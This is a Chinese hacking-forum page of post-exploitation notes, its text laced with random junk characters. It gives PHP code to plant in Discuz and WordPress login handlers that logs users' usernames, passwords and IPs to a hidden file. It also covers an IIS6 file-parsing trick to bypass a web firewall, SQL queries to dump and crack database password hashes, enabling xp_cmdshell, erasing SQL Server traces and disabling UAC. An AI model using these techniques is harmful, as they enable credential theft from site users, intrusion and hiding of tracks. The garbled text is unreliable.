当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
1 C+ o5 T7 Q6 Y7 a# T. d; u. {就是搜索case ‘login’4 c' \! b+ ]2 p( {1 o1 o1 s
在它下面直接插入即可,记录的密码生成在pwd.txt中,8 V6 Y; S+ k' q0 R
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
- l2 E/ G1 m  `% S利用II6文件解析漏洞绕过安全狗代码:- s  g- {1 a4 x# K" ^& Z1 L
;antian365.asp;antian365.jpg
( ~6 P9 l, R2 k. B4 _( I! W( x3 ~) r- P: S8 S3 r% l1 Y
各种类型数据库抓HASH破解最高权限密码!# R: k  h* @+ f! \, {- a$ ?) Y
1.sql server2000% j% e- a' G9 P' E7 a  q. \
SELECT password from master.dbo.sysxlogins where name='sa'
. l6 ?7 T- o+ h; y: C2 ^! j* j0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, w0 z3 Q& O; |- y' T
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
. u% z9 N' g3 [/ P3 T& p% k  J) X4 y3 k9 M9 @9 ^. |5 C; e
0×0100- constant header2 {+ {" m5 X- h1 n
34767D5C- salt
( {5 ~& `, ^) U* l; X+ ?) \0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
* v5 G) y1 W) w( y+ Z$ b. M2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
2 }1 K  [5 E# O# T# Jcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash4 c" n* z2 s- z& Q2 a4 }
SQL server 2005:-
7 r3 A& J/ i1 ]" h  ESELECT password_hash FROM sys.sql_logins where name='sa'
8 r" I, H% R4 j) ?  z0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
  T0 N, q2 S$ c  u0×0100- constant header$ t0 x+ E  _! ]5 S# f! w/ ^
993BF231-salt
5 ?1 P- L1 S" k8 {# z" ~% S' K* R5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
$ f" q; {3 e' I: L" j! S% tcrack case sensitive hash in cain, try brute force and dictionary based attacks.' }' k. b2 V3 w( k2 W, i1 V
4 a+ }7 _9 S2 s5 q; ], e
update:- following bernardo’s comments:-: c4 [+ x" f, P( _* S! l
use function fn_varbintohexstr() to cast password in a hex string.2 X0 J7 [& D8 u. {# i: h; \. z1 y
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins  F2 h4 v8 }1 `! H; C

* V/ d" Z: L1 @MYSQL:-1 s: {2 ~* u1 V# H5 L! \
/ R7 F" k2 Q0 O+ ?/ w
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
" ^* R3 p! I) x+ U: P( ~- W, O" [/ m2 w* j1 e+ u* e! d0 w% k0 J# m9 B
*mysql  < 4.15 Z% ?0 h. V, Y. C5 _

! q9 P$ t9 K# e( b% S8 d/ Bmysql> SELECT PASSWORD(‘mypass’);
) v0 G5 w0 g' \2 n6 U- a( K0 a9 R4 k+——————–+
0 `$ R+ i' @' X9 K3 E| PASSWORD(‘mypass’) |% z- o0 n" L6 k% r" {& E
+——————–+- M$ |8 E2 Q8 F! O+ [
| 6f8c114b58f2ce9e   |
# V6 N2 h/ O" l8 ?+ j0 X# B* b! e+——————–+
& u; v; B5 v# ?: L& \; T2 r5 C( h1 i0 Z/ U6 C9 `
*mysql >=4.1" f( i; Q3 a: G5 |

% G1 [' Q, @1 @( u* w5 g1 W4 }0 i8 T7 Umysql> SELECT PASSWORD(‘mypass’);' O. Y/ d0 ^( R5 J, y1 i0 `7 x9 S
+——————————————-+
7 \( f3 J6 h5 K' p5 K) D3 W| PASSWORD(‘mypass’)                        |
8 ?) |+ Y  y1 ]7 |' ?+——————————————-+
  b3 H/ z; b$ B2 S, W! D+ G| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+ j: r, p, Q9 v9 V. k+——————————————-+' b1 Y9 Z7 k& t8 U9 s' I' b2 L
( m8 y/ u3 J9 s2 s' b5 C' R' f' \3 L2 \
Select user, password from mysql.user
4 N/ h, g  ]  E$ BThe hashes can be cracked in ‘cain and abel’
. n* k; D/ b) a9 H9 P" e1 t: R& K5 i
Postgres:-* X! L$ u) J2 g. M
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)/ f$ _- D2 P' \; J! R7 O- z
select usename, passwd from pg_shadow;
+ O* f: U8 }( _  X# W) {: ]usename      |  passwd/ B2 z2 z  [* f0 W, o5 K( ?4 i# ]
——————+————————————-, E5 ?- x. x* M) J
testuser            | md5fabb6d7172aadfda4753bf0507ed4396' w! I) z1 r$ U4 g5 w
use mdcrack to crack these hashes:-
! c! u" y6 X* A) J# m  a$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43961 ~1 B6 u! h0 Q  k5 O( B. ?
4 l& O2 h" L2 c+ G
Oracle:-
/ v# d# e6 A' h& @select name, password, spare4 from sys.user$
& x4 _8 L4 ^* V) n- ahashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g7 r% p, n; |) C
More on Oracle later, i am a bit bored….
  u% h5 D' K1 U. _# G
: E1 H6 S! }. M, D* W
  P) @/ l5 |1 X在sql server2005/2008中开启xp_cmdshell, J: w- H/ s# s, p# L9 d$ z
-- To allow advanced options to be changed.& A5 L( i( |8 P4 w
EXEC sp_configure 'show advanced options', 1" _# K3 q/ ^1 K+ c3 q
GO
+ H) m+ h0 O: S-- To update the currently configured value for advanced options.
! w  F7 f! K) X8 ]4 tRECONFIGURE
( T  K' f9 f; X& t& |" O7 _7 iGO
" _% L4 a% I. D* T0 W-- To enable the feature.
/ h5 A! B4 e" g# r! BEXEC sp_configure 'xp_cmdshell', 1) L! d: {* o0 V2 p: h5 u) [
GO
1 x/ h4 v  y# u0 p4 o7 @. X-- To update the currently configured value for this feature.
; X- [( I% p9 GRECONFIGURE
& ^, y3 _. u1 p' PGO
! \% E5 @, J5 _- K. o' v$ ASQL 2008 server日志清除,在清楚前一定要备份。% d' v& Q6 }) }+ Q" o! `  M
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
( w( L  ?4 N3 h! i( ~+ y/ OX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
8 g1 m' o& H7 {  X- n' n. ?+ m# B9 \/ t7 P+ g8 r) X
对于SQL Server 2008以前的版本:' S6 F4 v9 j: \$ k& _0 ]( G
SQL Server 2005:
+ S4 }# y2 R% e2 f/ j) h9 O; m6 \删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat! s( f* ]3 S* z
SQL Server 2000:  y! J7 \8 @0 Q7 x+ _+ f
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。2 c' B# {0 p, ~
* Z0 e2 a% p3 o3 M
本帖最后由 simeon 于 2013-1-3 09:51 编辑3 @* X, ]5 [; l8 m2 T1 m, n

- a" ~+ Q# }5 q1 _% G: T* h: P* G% ~% \% ?6 v
windows 2008 文件权限修改
, L# t: E$ X8 L. K1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
  A' c: W+ K3 @: `2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad981 f1 [2 T+ K! p7 V* \6 x/ V
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,+ {4 k8 ~' N: a9 a& u
& K6 j( b4 u" e# g1 U9 x
Windows Registry Editor Version 5.006 i3 w) V8 Y& V; o3 e* a
[HKEY_CLASSES_ROOT\*\shell\runas]; U; L( G9 J& p! e! S9 _
@="管理员取得所有权"
; r4 p# {  l' Z  d4 M' {"NoWorkingDirectory"=""' j& o! E+ k2 h$ F0 e
[HKEY_CLASSES_ROOT\*\shell\runas\command]
2 s6 k; E# u1 ~@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ s" F4 I7 G" b4 V6 {8 @
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 `, K4 w* g/ C5 j/ p' E) X/ w
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
8 c; g& |6 e% w! K5 z@="管理员取得所有权"
% B: {: X: X. Z9 L$ b( t) s"NoWorkingDirectory"=""
# W+ Y8 ?" ]5 \& G  ^4 s$ s0 ~" c[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
1 M1 a+ L( W6 {2 A9 N) |* L2 \, l@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( P8 g: R2 }# \/ [7 ]+ F"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 v. z/ c+ A4 ?* A
" Y1 X, h8 R& L! R+ Z
[HKEY_CLASSES_ROOT\Directory\shell\runas]7 y1 O$ d) a9 H
@="管理员取得所有权"
; |. H5 `4 |; ^8 A% ]"NoWorkingDirectory"=""$ F  E* Y5 l+ V' i  U$ Q' v
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]" m' I/ N; z7 B$ A. d
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t": r8 g4 B" J& |3 P; V3 x9 R! b
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"9 Y- i/ }3 r0 c( G: S4 F2 L: I# v
5 u8 o& s" q# R: V5 Z/ C5 {
# P4 ]; K7 I) p) f* E* G
win7右键“管理员取得所有权”.reg导入0 Z! y" E) n! k0 _/ O. U
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
! m1 X+ w' m% i) U1、C:\Windows这个路径的“notepad.exe”不需要替换
% w* X3 ~8 g: x6 Z+ ]% q2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
* E# ^2 e4 ]5 ~3 l3、四个“notepad.exe.mui”不要管) r9 @1 |4 b5 V+ a! Y9 w5 X+ ?$ F7 c
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
' ]3 N& J: ^% x0 bC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
! N+ d3 r; i/ `) }7 {2 \替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,$ C) Y. _' M6 i! C( f1 S: I9 \
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
3 Y/ D. @" N0 g# S1 [6 P/ kwindows 2008中关闭安全策略: ; Y4 d* P& b4 v3 n
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3 G# F1 P9 J6 I6 [8 R3 t修改uc_client目录下的client.php 在- l- p7 x# D$ A) p
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
& s" e; O: [" M8 p6 p9 l: b下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
% o" d" ]! V  n# w- R1 C; o, |你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
/ q# y7 S! Y: Z+ r& l' Q  hif(getenv('HTTP_CLIENT_IP')) {& F- e. S" P* B$ v
$onlineip = getenv('HTTP_CLIENT_IP');
0 e6 i9 F- ?. _} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
# W1 w( _" P4 z$ \+ d4 W* Q( u$onlineip = getenv('HTTP_X_FORWARDED_FOR');
$ ~+ @9 G- [  t} elseif(getenv('REMOTE_ADDR')) {
/ j7 g# M& A* i! ]2 Z$onlineip = getenv('REMOTE_ADDR');
+ Z: n+ A0 V4 ~0 r* @; e( ]} else {
6 @7 r1 f; z$ c$ n0 l$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];/ u- A8 ?2 d) h2 q
}
% b! {3 y6 s) O: _' b$ l5 u5 `' S4 c     $showtime=date("Y-m-d H:i:s");
8 @1 {4 L* t( O; n    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";+ t( h1 E6 o, m
    $handle=fopen('./data/cache/csslog.php','a+');
8 m9 B" b* M3 H5 {4 @    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2